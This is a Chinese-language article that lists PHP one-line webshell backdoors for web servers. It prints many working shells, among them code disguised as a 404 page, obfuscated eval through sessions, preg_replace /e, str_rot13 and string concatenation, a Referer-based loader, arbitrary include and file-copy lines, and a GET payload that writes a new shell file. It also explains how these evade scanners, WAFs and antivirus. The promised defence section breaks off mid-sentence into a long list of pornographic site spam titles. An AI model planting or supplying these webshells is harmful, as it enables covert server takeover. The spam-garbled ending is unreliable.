我們以一個學習的心態來對待這些PHP后門程序,很多PHP后門代碼讓我們看到程序員們是多么的用心良苦。
強悍的PHP一句話后門
這類后門讓網站、服務器管理員很是頭疼,經常要換著方法進行各種檢測,而很多新出現的編寫技術,用普通的檢測方法是沒法發現并處理的。今天我們細數一些有意思的PHP一句話木馬。
利用404頁面隱藏PHP小馬:
Not Found
The requested URL was not found on this server.
<?php@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>
404頁面是網站常用的文件,一般建議好后很少有人會去對它進行檢查修改,這時我們可以利用這一點進行隱藏后門。
無特征隱藏PHP一句話:
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('/'a/'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[/'theCode/']))','a');
將$_POST['code']的內容賦值給$_SESSION['theCode'],然后執行$_SESSION['theCode'],亮點是沒有特征碼。用掃描工具來檢查代碼的話,是不會報警的,達到目的了。
超級隱蔽的PHP后門:
<?php $_GET[a]($_GET[b]);?>
僅用GET函數就構成了木馬;
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
執行后當前目錄生成c.php一句話木馬,當傳參a為eval時會報錯木馬生成失敗,為assert時同樣報錯,但會生成木馬,真可謂不可小視,簡簡單單的一句話,被延伸到這般應用。
層級請求,編碼運行PHP后門:
此方法用兩個文件實現,文件1
<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
文件2
<?php//2.phpheader('Content-type:text/html;charset=utf-8');//要執行的代碼$code = << $url, CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_REFERER => $referer);curl_setopt_array($ch, $options);echo curl_exec($ch);
通過HTTP請求中的HTTP_REFERER來運行經過base64編碼的代碼,來達到后門的效果,一般waf對referer這些檢測要松一點,或者沒有檢測。用這個思路bypass waf不錯。
PHP后門生成工具weevely
weevely是一款針對PHP的webshell的自由軟件,可用于模擬一個類似于telnet的連接shell,weevely通常用于web程序的漏洞利用,隱藏后門或者使用類似telnet的方式來代替web 頁面式的管理,weevely生成的服務器端php代碼是經過了base64編碼的,所以可以騙過主流的殺毒軟件和IDS,上傳服務器端代碼后通??梢酝ㄟ^weevely直接運行。
weevely所生成的PHP后門所使用的方法是現在比較主流的base64加密結合字符串變形技術,后門中所使用的函數均是常用的字符串處理函數,被作為檢查規則的eval,system等函數都不會直接出現在代碼中,從而可以致使后門文件繞過后門查找工具的檢查。使用暗組的Web后門查殺工具進行掃描,結果顯示該文件無任何威脅。
以上是大概介紹下邊是截圖,相關使用方法亦家就不在這介紹了,簡單的科普一下。

三個變形的一句話PHP木馬
第一個
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
在菜刀里寫http://site/1.php?2=assert密碼是1
第二個
<?php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?><?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
在菜刀里寫http://site/2.php?_=assert&__=eval($_POST['pass']) 密碼是pass。如果你用菜刀的附加數據的話更隱蔽,或者用其它注射工具也可以,因為是post提交的。
第三個
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
str_rot13(‘riny’)即編碼后的eval,完全避開了關鍵字,又不失效果,讓人吐血!
最后列幾個高級的PHP一句話木馬后門:
1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
2、
$filename=$_GET['xbid'];
include ($filename);
//危險的include函數,直接編譯任何文件為php格式運行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
5、include ($uid);
//危險的include函數,直接編譯任何文件為php格式運行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句話
6、典型一句話
程序后門代碼
<?php eval_r($_POST[sb])?>
程序代碼
<?php @eval_r($_POST[sb])?>
//容錯代碼
程序代碼
<?php assert($_POST[sb]);?>
//使用lanker一句話客戶端的專家模式執行相關的php語句
程序代碼
<?$_POST['sa']($_POST['sb']);?>
程序代碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用這個后,使用菜刀一句話客戶端在配置連接的時候在"配置"一欄輸入
程序代碼
h=@eval_r($_POST1);
程序代碼
//繞過<?限制的一句話
綜上,這些PHP一句話后門可謂五臟俱全,一不小心您肯定中招了,而我們今天這篇文章的重中之重在哪呢?重點就在下邊的總結!
如何應對PHP一句話后門:
我們強調幾個關鍵點,看這文章的你相信不是門外漢,我也就不亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
97成人精品区在线播放|
国产精品jvid在线观看蜜臀|
欧美成年人视频网站欧美|
久久精品视频99|
欧美大尺度在线观看|
欧美乱人伦中文字幕在线|
国产视频亚洲视频|
欧美日韩在线观看视频小说|
日韩av电影手机在线观看|
法国裸体一区二区|
久久成人国产精品|
精品亚洲国产视频|
亚洲男人av在线|
欧美极品少妇xxxxⅹ喷水|
国产成人精品免费久久久久|
69精品小视频|
国产成人在线一区二区|
永久免费精品影视网站|
亚洲福利视频二区|
亚洲综合最新在线|
国产精品综合久久久|
国内外成人免费激情在线视频网站|
国内久久久精品|
一本色道久久88亚洲综合88|
国产精品高精视频免费|
欧美视频精品一区|
精品国产一区av|
久久久免费观看|
少妇av一区二区三区|
色狠狠av一区二区三区香蕉蜜桃|
亚洲女同精品视频|
欧美一级大片在线观看|
亚洲成人黄色在线|
中日韩美女免费视频网址在线观看|
日本欧美国产在线|
国产免费久久av|
国产精品爽黄69|
91精品国产综合久久香蕉|
久久香蕉精品香蕉|
久久久久久久久久婷婷|
欧美日韩亚洲视频一区|
亚洲自拍另类欧美丝袜|
久久久久99精品久久久久|
蜜臀久久99精品久久久无需会员|
欧美激情第1页|
欧美丝袜一区二区|
欧美一区深夜视频|
91久久久久久久一区二区|
日韩av手机在线|
亚洲欧美日本另类|
亚洲欧美日本精品|
在线电影中文日韩|
久久久久久国产精品久久|
久久综合久久美利坚合众国|
91精品国产高清自在线看超|
国产69精品久久久久99|
亚洲成人久久一区|
97超视频免费观看|
久久久久久久久久久网站|
91色琪琪电影亚洲精品久久|
久久久97精品|
成年无码av片在线|
久久国产天堂福利天堂|
91精品啪aⅴ在线观看国产|
欧美激情一区二区三级高清视频|
国产欧美一区二区三区视频|
欧美日韩免费网站|
久久精品国产亚洲精品2020|
最新91在线视频|
日韩av一区二区在线|
久热在线中文字幕色999舞|
欧美精品福利在线|
国产成人一区二区三区小说|
欧美理论在线观看|
久久久久亚洲精品|
久久人人爽人人爽人人片亚洲|
亚洲国产中文字幕久久网|
亚洲qvod图片区电影|
亚洲三级av在线|
国产精品久久网|
国产日韩专区在线|
久久这里有精品视频|
亚洲新声在线观看|
国产精品久久视频|
在线视频国产日韩|
91精品国产91久久久久久不卡|
国产丝袜一区二区|
77777少妇光屁股久久一区|
国产精品成人一区二区三区吃奶|
91国内免费在线视频|
久久精品视频导航|
91久久嫩草影院一区二区|
欧美亚洲在线视频|
一本色道久久综合亚洲精品小说|
欧美日韩一区二区在线|
久久精品亚洲国产|
亚洲高清久久久久久|
91精品国产高清久久久久久久久|
日韩av在线电影网|
97久久久免费福利网址|
国产一区二区三区久久精品|
国产做受高潮69|
91av在线影院|
欧美成人国产va精品日本一级|
欧美黑人xxx|
日韩精品在线免费观看视频|
亚洲精品视频网上网址在线观看|
亚洲国产日韩欧美在线图片|
2019日本中文字幕|
国产精品久久国产精品99gif|
www国产91|
久久人人爽人人|
亚洲最大在线视频|
九色成人免费视频|
www.午夜精品|
日韩精品在线免费播放|
欧美成人午夜激情视频|
日韩国产精品视频|
国产91精品视频在线观看|
欧美日韩一区二区三区在线免费观看|
欧美福利视频在线观看|
国产精品无码专区在线观看|
97国产suv精品一区二区62|
久久夜色精品国产欧美乱|
国内免费久久久久久久久久久|
欧美日韩国产精品一区二区不卡中文|
久久精品久久久久电影|
亚洲国产美女久久久久|
国产精品av电影|
色琪琪综合男人的天堂aⅴ视频|
国产精品va在线|
另类图片亚洲另类|
国产精品444|
亚洲伊人久久综合|
日韩av网站在线|
日韩精品免费在线|
日韩欧美在线国产|
国产精品女人久久久久久|
成人午夜小视频|
亚洲小视频在线|
在线播放国产一区中文字幕剧情欧美|
欧美日韩性生活视频|
成人免费网站在线|
日韩av在线播放资源|
日韩av在线精品|
国产欧美婷婷中文|
久久久噜噜噜久久久|
欧美激情视频网址|
69av成年福利视频|
久久国产精品99国产精|
国产女人精品视频|
亚洲精品久久久久久久久久久久久|
日韩av最新在线观看|
日本不卡高字幕在线2019|
亚洲成人av中文字幕|
中文字幕在线看视频国产欧美|
国产亚洲欧美一区|
九九精品在线播放|
中文字幕久久亚洲|
亚洲毛片在线观看.|
午夜精品一区二区三区在线视频|
日韩一中文字幕|
性欧美视频videos6一9|
久久精品人人爽|